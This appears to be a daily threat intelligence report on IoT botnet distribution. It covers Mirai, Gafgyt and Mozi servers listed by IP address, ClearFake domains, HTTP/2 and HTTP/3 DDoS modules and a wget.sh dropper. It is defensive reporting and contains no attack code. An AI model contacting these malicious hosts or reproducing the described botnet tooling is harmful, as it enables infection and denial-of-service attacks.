On April 22, 2026, threat intelligence collection focused primarily on malware distribution infrastructure targeting Internet of Things (IoT) and embedded systems. The predominant threat observed was active distribution of Mirai and Gafgyt botnet malware variants across multiple architectures from two distinct command-and-control servers. Additionally, ClearFake malware distribution was detected through compromised domains, indicating ongoing browser-based social engineering campaigns.
The malware distribution infrastructure demonstrates sophisticated targeting of diverse processor architectures including ARM, MIPS, x86, PowerPC, RISC-V, and s390x platforms, suggesting attackers are maximizing botnet recruitment across vulnerable IoT devices, routers, and embedded systems globally. The presence of HTTP/2 and HTTP/3 DDoS attack modules (h2stream, h2rapidreset, h3flood) indicates these botnets are being weaponized for volumetric distributed denial-of-service campaigns. Legacy Mozi botnet activity was also detected, demonstrating persistence of older IoT threats.
Organizations should prioritize patching and securing IoT devices, implementing network segmentation for embedded systems, and monitoring for unusual outbound traffic patterns indicative of botnet command-and-control communications. The absence of new critical vulnerabilities or known exploited vulnerabilities in this reporting period suggests attackers continue exploiting existing security gaps in poorly maintained IoT infrastructure rather than leveraging zero-day exploits.
Two active malware distribution servers (176.65.139.143 and 176.65.139.8) are hosting Mirai and Gafgyt botnet variants targeting multiple processor architectures, indicating large-scale IoT compromise campaigns.
Server hosting comprehensive Mirai botnet variants across 19+ architectures including ARM, MIPS, x86, PowerPC, RISC-V, and s390x. Includes specialized HTTP/2 and HTTP/3 DDoS attack modules (h2stream, h2rapidreset, h3flood) indicating preparation for volumetric DDoS campaigns.
Distribution server hosting both Gafgyt and Mirai malware variants for ARM architectures (ARMV4L, ARMV5L, ARMV6L) and x86 platforms (X86_64, I686), targeting diverse IoT devices and embedded systems.
Mozi botnet malware distribution observed from IP 123.129.134.47:49044, representing continued activity of this peer-to-peer IoT botnet despite previous disruption efforts. Mozi typically targets unpatched network devices and DVRs.
Two domains (closedsun.over-resweat.in.net and lumcrest0is.over-resweat.in.net) hosting ClearFake malware, a browser-based social engineering framework that displays fake update prompts to trick users into downloading malicious payloads.
Observed malware infrastructure demonstrates sophisticated attack capabilities including HTTP/2 rapid reset attacks, HTTP/3 flooding, and comprehensive architecture coverage for maximum botnet recruitment.
Malware distribution includes h2rapidreset variants across multiple architectures, implementing the CVE-2023-44487 HTTP/2 rapid reset vulnerability for amplified DDoS attacks. This technique can overwhelm servers with minimal attacker resources.
Threat actors compiled malware for 15+ distinct processor architectures including emerging platforms (RISC-V) and legacy systems (s390x, PowerPC), maximizing infection surface across IoT devices, embedded systems, routers, and specialized hardware.
wget.sh shell script detected on distribution server, likely used as initial infection vector for vulnerable IoT devices with weak credentials or unpatched vulnerabilities. Script automates download and execution of architecture-appropriate malware binaries.
New research published on indicator of compromise enrichment methodologies, providing guidance for security teams on leveraging multiple threat intelligence sources for comprehensive threat analysis.
Research publication examining the importance of correlating threat indicators across multiple intelligence feeds to improve detection accuracy, reduce false positives, and provide contextual understanding of threat actor tactics and infrastructure.